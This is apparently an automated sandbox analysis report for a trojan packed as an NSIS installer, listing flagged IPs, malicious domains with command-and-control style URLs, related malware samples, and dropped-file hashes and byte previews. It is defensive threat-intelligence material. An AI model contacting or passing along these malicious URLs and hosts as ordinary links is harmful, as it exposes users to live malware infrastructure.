                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.typography.netDexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://fontfabrik.comexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                    high
                                    http://nsis.sf.net/NSIS_Error444890321.exefalse
                                      high
                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fonts.comexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.krexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sakkal.comexplorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          199.59.242.153
                                          www.oklahomasundayschool.comUnited States
                                          395082BODIS-NJUStrue
                                          163.44.239.72
                                          mekarauroko7389.comJapan7506INTERQGMOInternetIncJPtrue
                                          35.169.40.107
                                          www.shamushalkowich.comUnited States
                                          14618AMAZON-AESUStrue

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:433174
                                          Start date:11.06.2021
                                          Start time:12:14:23
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 36s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:444890321.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:27
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@9/4@3/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 26.3% (good quality ratio 24.5%)
                                          • Quality average: 77.3%
                                          • Quality standard deviation: 29.4%
                                          HCA Information:
                                          • Successful, ratio: 89%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.43.139.144, 92.122.145.220, 13.64.90.137, 168.61.161.212, 23.218.208.56, 20.82.209.183, 93.184.221.240, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.50.102.62
                                          • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433174/sample/444890321.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          199.59.242.1532435.exeGet hashmaliciousBrowse
                                          • www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W
                                          ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                          • www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
                                          fD56g4DRzG.exeGet hashmaliciousBrowse
                                          • www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
                                          malware300.docmGet hashmaliciousBrowse
                                          • ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
                                          Payment.exeGet hashmaliciousBrowse
                                          • www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp
                                          PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                          • www.chrispricellc.com/owws/?y8z=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6zNTHuB4YMFv&UDKPKv=04i8JpzhsHVX
                                          Order.exeGet hashmaliciousBrowse
                                          • www.sweeneysservicecenter.com/jogt/?w6ATB0=U2LhZ94w5IDC+2DErQbRlpD/OzsCIaT6lUf8FwZRqb7l7kFTMUkxaoKrt4WuZdpJEkCM&Jxox=Er6tXhMxl
                                          INQ-741-020621-PDF.exeGet hashmaliciousBrowse
                                          • www.hairgrowinggenius.com/pb93/?a0GLMhc=KPEvW4YRciSJiJFFNYizsATDgsgPxpmwnLISCA8VBLwfqs8m2gzQMN5Q9cE7knzB0ifR&rTqL5=0DKH1VwxRB
                                          CONTAINER DEPOSIT.exeGet hashmaliciousBrowse
                                          • www.northsytyle.com/dxe/?nPRT_Pn=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W&k6Ad3=_vc0KnhxhJu
                                          Swift copy_9808.exeGet hashmaliciousBrowse
                                          • www.scientiagenus.com/p6nu/?C2JdTP=eE7I+Sv8iOFRLyMlwLdgwXijBECgGV3UTircOP7TdIwQdQ324QcldvmuNHuZw5leTbqh&z6nHM=ITnT9Fg
                                          #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                          • www.jobswithsecurityclearance.com/pux4/?Lv0h=3mylV7pVONTMNM6aC/niqCihOZ2+qzoqaVpusSVEetlxoEhqYhjCa0mWM/mNyWLbLdeFpUieiA==&VlKt=wBNl4pd0L
                                          Pdf Scen Invoice 17INV06003.exeGet hashmaliciousBrowse
                                          • www.friendsed.com/s5cm/?O2=aT8vL+GQ5CKbWMYK7VfKTGSzb4SrkpvWRcVzxRDty813pzzqsjZ5NUDQNQmBAQnsw0DU&2d=YX9ti2PX
                                          ORDER LIST.pdf.exeGet hashmaliciousBrowse
                                          • www.chrispricellc.com/owws/?t8l=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whQbeNAVt45EvY6Zw==&YBZL=lxldV
                                          quote.pdf.exeGet hashmaliciousBrowse
                                          • www.chrispricellc.com/owws/?rVEx8D=S0GhCH&RR=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whpEvtDb7k+EvY9KA==
                                          hrUbr1mLqzggh0H.exeGet hashmaliciousBrowse
                                          • www.poltgroup.com/onqm/?6l=doD+GTTuj0wR7cILLxImcVYaTf1RJOz68mAknHdMm+lQBhaMdEcvcwimwgDNMMFRe7JRpz2F8Q==&2dm=3fklvpq0OPLdJVy
                                          packa.....(1).exeGet hashmaliciousBrowse
                                          • www.educationstarcorp.com/wdva/?kfD4qZ=xabDW6gRomVRJCfQhE+1Y8vLHDgRz3GtPRqb2ZQ8ev+ZOg56Covo/3nqdMEaAH6lCy+g&kr0=dbF0vFoPNvL
                                          Pdf MT103 - Remittance.pdf.exeGet hashmaliciousBrowse
                                          • www.ultimateplumpudding.co.uk/s5cm/?kR-4q=E2OK2mHSQGkTABA7rh5rFu9YJ97LBg918ZBY5I6VyKJbM1VF4fyc5eTvcYaTxAWeq+U4CfyJeQ==&P0D=Atxturd
                                          henry.exeGet hashmaliciousBrowse
                                          • www.booster.guru/aipc/?MZg=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&zTxX=ApdHHR
                                          Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                          • www.greenshirecommons.com/un8c/?vR=Ltxx&5j9=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwtQB3QA9Z6BY
                                          porosi e re Fature Proforma.exeGet hashmaliciousBrowse
                                          • www.fux.xyz/nt8e/?v2Mp4=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&jJBP5D=-ZpPy
                                          163.44.239.72bdc0c7d3_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • www.mekarauroko7389.com/ccr/?LPF8=DYL3Molyr77d86ER84Ycjijbq71Py48wOUnCGpBVH55C30whJeiW1MNKJ4WqzaVkq0mDKw==&pBZ8=erpxZdFXSD
                                          pvUopSIi7C5Eklw.exeGet hashmaliciousBrowse
                                          • www.ero-dogamax.com/cpo/?AnB=ZOKfawDDM5+ycPLMG5OeFWFqAlRMpdVZ2hrxY6qKonp9UXmNLhtdrUIXIGr69n5opRML&kFQhxH=5jp8cV8xwZ8x
                                          Reconfirm seed quotation_ RUQ CONT NOB13452.exeGet hashmaliciousBrowse
                                          • www.your-card.net/suod/
                                          QUOTE110.exeGet hashmaliciousBrowse
                                          • www.personalityisfree.com/vcd/?BB=Lzr4TtmpAHX4&YVMtapH=K+HZCw1qHYHdC+KSQX14d+D7ShJKCk/WiYrY/rNA5FzJi9N3qVpBsDMMRcWgkf/UdnmV

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          INTERQGMOInternetIncJP5t2CmTUhKc.exeGet hashmaliciousBrowse
                                          • 150.95.255.38
                                          lTAPQJikGw.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          invoice.exeGet hashmaliciousBrowse
                                          • 163.44.185.221
                                          PO187439.exeGet hashmaliciousBrowse
                                          • 118.27.99.19
                                          LkvumUsaQX.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          FORM C1.xlsxGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          triage_dropped_file.exeGet hashmaliciousBrowse
                                          • 163.44.185.221
                                          qXDtb88hht.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          FORM B.xlsxGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          17jLieeOPx.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          Compliance - Request for Courtesy Call -.xlsxGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          6dTTv9IdCw.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          000987654345XASD.exeGet hashmaliciousBrowse
                                          • 163.44.185.226
                                          QyKNw7NioL.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          Request for Courtesy Call - Urgent.xlsxGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          Invoice.exeGet hashmaliciousBrowse
                                          • 150.95.254.16
                                          wMKDi0Ss3f.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          ENrFQVzLHE.exeGet hashmaliciousBrowse
                                          • 163.44.239.73
                                          USD 187036 pdf.exeGet hashmaliciousBrowse
                                          • 163.44.185.226
                                          AMAZON-AESUS8BDBD0yy0q.apkGet hashmaliciousBrowse
                                          • 3.213.149.159
                                          8BDBD0yy0q.apkGet hashmaliciousBrowse
                                          • 3.210.126.214
                                          c71fd2gJus.exeGet hashmaliciousBrowse
                                          • 107.23.214.167
                                          E1a92ARmPw.exeGet hashmaliciousBrowse
                                          • 34.205.91.18
                                          crt9O3URua.exeGet hashmaliciousBrowse
                                          • 34.205.91.18
                                          E1a92ARmPw.exeGet hashmaliciousBrowse
                                          • 34.205.91.18
                                          triage_dropped_file.dllGet hashmaliciousBrowse
                                          • 23.23.104.250
                                          o53icSdh9N.exeGet hashmaliciousBrowse
                                          • 34.202.33.33
                                          qdAbNSGIbq.exeGet hashmaliciousBrowse
                                          • 52.204.109.97
                                          DNPr7t0GMY.exeGet hashmaliciousBrowse
                                          • 54.85.86.211
                                          omh.dllGet hashmaliciousBrowse
                                          • 23.21.205.229
                                          fTxhRIDnrC.dllGet hashmaliciousBrowse
                                          • 34.201.169.54
                                          Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                          • 54.85.86.211
                                          XumsQCALnX.exeGet hashmaliciousBrowse
                                          • 54.235.190.106
                                          MV SHUHA QUEEN.docxGet hashmaliciousBrowse
                                          • 54.83.52.76
                                          MV SHUHA QUEEN.docxGet hashmaliciousBrowse
                                          • 54.83.52.76
                                          Docc.htmlGet hashmaliciousBrowse
                                          • 52.44.21.50
                                          ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                          • 34.236.65.196
                                          Sleek_Free.exeGet hashmaliciousBrowse
                                          • 52.2.188.208
                                          #Ud83d#Udcde_#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                                          • 52.44.21.50
                                          BODIS-NJUS2435.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          fD56g4DRzG.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          malware300.docmGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          Payment.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          Order.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          INQ-741-020621-PDF.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          CONTAINER DEPOSIT.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          Swift copy_9808.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          S5.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          Pdf Scen Invoice 17INV06003.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          ORDER LIST.pdf.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          quote.pdf.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          hrUbr1mLqzggh0H.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          packa.....(1).exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          Pdf MT103 - Remittance.pdf.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          henry.exeGet hashmaliciousBrowse
                                          • 199.59.242.153
                                          Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                          • 199.59.242.153

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dllPacking-List_00930039.exeGet hashmaliciousBrowse
                                            2435.exeGet hashmaliciousBrowse
                                              INVOICE.exeGet hashmaliciousBrowse
                                                Shipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                                  KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                    5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                      8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                        New Order PO2193570O1.docGet hashmaliciousBrowse
                                                          L2.xlsxGet hashmaliciousBrowse
                                                            Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                              New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                2320900000000.exeGet hashmaliciousBrowse
                                                                  CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                    5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                      i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                        AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                          090049000009000.exeGet hashmaliciousBrowse
                                                                            dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                              PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\dyngsgthl
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):56913
                                                                                  Entropy (8bit):4.949731846404961
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:VkJEJVyJy/L1CrDov35urtMC1c2hcv094+3:+JEJkuUrO35uro2N3
                                                                                  MD5:ABBA582340515314EC9FF824C04D0411
                                                                                  SHA1:06D227DE691D5A71EE18B380B9C2E9C1CE004921
                                                                                  SHA-256:D068732E61DE049EFBCB653C38143BB2F21744AB0D88D7622CD15D79875D3E8F
                                                                                  SHA-512:AFAC536FDBEBF4E00CD8671B70F01373C29924E93F0297304A4A053AEAE50CAE1B6F036B490BF3C1F6DD1E3D5205EB3B19B0A1C3E7C7C8E1501DA68334FB856A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: U............ ...Z.!....."...q.#...A.$...A.%...6.&.....'.....(.....).....*.....+...A.,...6.-.........../.....0.....1...].2...t.3...A.4...A.5.....6...&.7.....8...A.9.....:.....;.....<...q.=...A.>...A.?...A.@.....A.....B.....C.....D.....E.....F.....G.....H.....I...A.J.....K...s.L.....M.....N.....O.....P...A.Q...A.R.....S.....T.....U.....V.....W.....X.....Y.....Z.....[.....\...9.].....^....._.....`...X.a.....b.....c.....d.....e...u.f...A.g...A.h...A.i.....j.....k...a.l...|.m...|.n...|.o.....p.....q.....r.....s.....t.....u...A.v.....w...s.x.....y.....z.....{.....|...A.}...A.~...............................................................9.......................X.......................I.....y.....A.....A.....A.......................|.....|.....|.................].................I.....A...........s.................]...........A.....A.................]
                                                                                  C:\Users\user\AppData\Local\Temp\nskAF63.tmp
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):276572
                                                                                  Entropy (8bit):7.48217833714595
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:sIHJRey4HqAoXOHXTBALgPk5k29GgTH2M0OUBot:RRnqM5k3sH2MjU+
                                                                                  MD5:81B6D7E7A76985346D6B8FDD2AAF7B64
                                                                                  SHA1:CE54CE32897D9A51ED74F5C76CD5154C8E631785
                                                                                  SHA-256:ABB0E78106433D40D7CD85ABB08963E8E15CF7F951BFFAD9F132E8B66E729819
                                                                                  SHA-512:90A64CF37A33CF50950A693A00625A8BC4F8ADE4080E63135C3173FC394D492115580B5658E191A572C1CFEB926F839306F60A4E1CC64DA80DF0022E0EAA791F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: .S......,.......................T=.......S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dll
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.855045165595541
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                  MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                  SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                  SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                  SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Packing-List_00930039.exe, Detection: malicious, Browse
                                                                                  • Filename: 2435.exe, Detection: malicious, Browse
                                                                                  • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                  • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse
                                                                                  • Filename: KY4cmAI0jU.exe, Detection: malicious, Browse
                                                                                  • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                  • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                  • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                  • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                  • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                  • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                  • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                  • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                  • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                  • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                  • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                  • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                  • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                  • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                  • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\ouzr6npxcb2d0txj
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):186368
                                                                                  Entropy (8bit):7.9990513558568574
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:zE6sRey1So6RqgToX1zJCHnYcTBALhrGPPaOmr5k2o4kTgBF3py80:GRey4HqAoXOHXTBALgPk5k29GgTH0
                                                                                  MD5:5205D9669FCC651E0611AA9081C47CE9
                                                                                  SHA1:C785A1B2A4F8A50F8E4DAD7304819FB4E162BB61
                                                                                  SHA-256:DDAED0614378CE5EB6110B6AF722F4878715C08BEAE158FAB0C705FC6D525EFD
                                                                                  SHA-512:7C817F5483309799D174D320D1A7F50F856CDCBAF5C4DDAF0791EFB8A277C1F73DBBA657F9EC1A49EA20703476A64C62A2051449C5E0DB859695FA746AB73328
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ..H}.Y...H.j...j.0N...7..GW...{.-....I.._..r..a.Mh..H.a.#-~...<..5..-.......q.[..+q.....+}......SRB..a.i/<.\.2h@..r..._....1..d..cS..L..NP...!.s.3.X.xN.=....y..f.Jz.R..2.....?..b.iH........K.8QaDeX.k....p<.8........f#M.....h.H.....A.....if........5..V.B..o..5D...lgg.-..6......:.....A......DT..!....M.......H+x|v....N....P.:..F<..IA...(...}..-D).}.g......iR;|..Q..H..Ls.\$.Yy..Xn@.V.|cp.k....uA.5..`MW#i.7>.VD...P+K.8.zt.R....-...Y..yA.b.]....@.i7.".~.F.mQ......L."....|!.V...w.Z..c....ILg....%[z..:....?..V;.....C...m...$.e......P.(...../{..Z..u....Q...ag..rH...m0FJG9...S\........ ..J].'".dI'...o.%7%:...b.....p.+Q..L).C..I..hR.#...e.....A*.9....*58....~M.7..QI...32..ge...U.2o.....!.v.....1.B..G[..9.k.s42P..k...8.jf.&R.0.U...]r...}/u.^.Da.a.m..".......N.....0k.m.-q`..".c..."... ..o...,....c.`Y.]..L.-.....0..<o,..b..h&.iT.I.JM..... .Tt7:.<.......nT..9..d....g)q........*."..iA.....k........y.Hv.U...A.A")...1$G.(....[-VRZ.JN...I...8................{...

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.924378761315436
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:444890321.exe
                                                                                  File size:245867
                                                                                  MD5:f161fe51fee0cd2f542ea759241c88cb
                                                                                  SHA1:cd75d9c5a293151ad50dfa1d05edb5871fc08ad5
                                                                                  SHA256:d2d2d97ab2f2c78a230c58a61296504419d0b545c6c6d76193b654dfe9937499
                                                                                  SHA512:6481a88054e6a0eb989e92904606e890a8e8f04cd8ab016162fa753570ec3841215ac2f16d98cb0ba67cfaf3b7a56c0fcc66df45e46823116e374859d4fbcbb9
